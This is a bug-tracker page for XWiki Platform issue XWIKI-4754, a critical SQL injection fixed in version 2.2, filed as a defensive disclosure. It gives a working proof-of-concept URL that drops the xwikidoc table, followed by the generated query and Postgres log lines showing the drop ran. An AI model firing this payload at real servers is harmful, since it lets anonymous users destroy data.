Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-4754

SQL injection from URL by users who are not logged in.

    XMLWordPrintable

Details

    • Bug
    • Resolution: Fixed
    • Critical
    • 2.1.2
    • 2.2
    • Storage
    • None
    • Postgres and Mysql
    • Easy

    Description

      SQL injection ruin bypasses XWiki and Hibernate security.
      Against multi-lingual wikis, can be used by anonymous user.
      Also effective against single language wikis if user is logged in.

      http://127.0.0.1:8081/xwikiTrunk/bin/view/Main\\' or ' = /; drop table xwikidoc; commit; --\
      

      Tested using PostgreSQL and Mysql.

      ' is converted to '' and query is generated:
      select doc.language from XWikiDocument as doc where doc.space = 'Main
      '' or '' = ' and doc.name = '; drop table xwikidoc; commit; --\' and (doc.language <> '' or (doc.language is not null and '' is null))
      Hibernate turns
      into \ and "Main
      ''" becomes "Main\''"

      Postgres log:
      WARNING: nonstandard use of \' in a string literal at character 100
      HINT: Use '' to write quotes in strings, or use the escape string syntax (E'...').
      LOG: execute <unnamed>: select xwikidocum0_.XWD_LANGUAGE as col_0_0_ from xwikidoc xwikidocum0_ where xwikidocum0_.XWD_WEB='Main\'' or '' = ' and xwikidocum0_.XWD_NAME='
      LOG: execute <unnamed>: drop table xwikidoc
      LOG: execute <unnamed>: commit

      Attachments

        Issue Links

          Activity

            People

              calebjamesdelisle CalebJamesDeLisle
              calebjamesdelisle CalebJamesDeLisle
              Votes:
              0 Vote for this issue
              Watchers:
              0 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: